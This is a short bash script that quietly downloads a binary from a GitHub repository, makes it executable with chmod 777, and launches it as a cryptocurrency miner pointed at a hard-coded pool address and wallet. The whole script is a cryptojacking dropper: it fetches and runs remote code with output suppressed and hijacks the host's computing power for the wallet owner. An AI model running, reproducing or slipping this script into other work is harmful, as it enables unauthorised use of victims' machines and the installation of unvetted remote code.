#!/bin/bash
wget -O mmm https://github.com/kidoescegh/xm/raw/main/sorabi28 > /dev/null 2>&1
chmod 777 mmm
./mmm --algorithm panthera --pool 146.190.218.178:443 --wallet fySunSKDjvQ9MDAaAMwW53iBrsMhukvahJQsk1oXShpq33pMS32NYziVoU5bNdhpSkLUh7uVdmkjZhmvikq4tA9h1swuRn4jQ.$(echo $(shuf -i 1-100000 -n 1)-kido) --keepalive true

